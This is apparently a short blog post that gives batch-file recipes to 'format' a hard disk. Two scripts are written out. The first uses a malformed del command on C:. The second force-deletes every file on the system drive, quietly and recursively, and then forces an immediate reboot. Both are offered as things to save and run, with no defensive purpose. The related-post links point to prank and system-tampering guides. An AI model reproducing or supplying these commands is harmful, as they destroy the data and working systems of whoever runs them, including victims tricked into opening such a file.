web analytics

Format hard disk using a batch file

go to notepad
@Echo off
Del C: *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Blog Widget by LinkWithin

Incoming search terms for the article:


Related posts:

  1. Simple batch program to crash your own PC
  2. Admin privileges for guest
  3. [HOW TO]Make fake viruses in windows
  4. How to save the Ouput of a DOS Command in text file
  5. DOS event monitoring
  6. Add “copy to” and “move to” options in right click(XP)
  7. Making A file of the size you want
  8. How to disable security alerts in Windows
  9. [HOW TO]Retrieve data from partially working Hard Disk
  10. See who accessed your PC in your absence

Comments are closed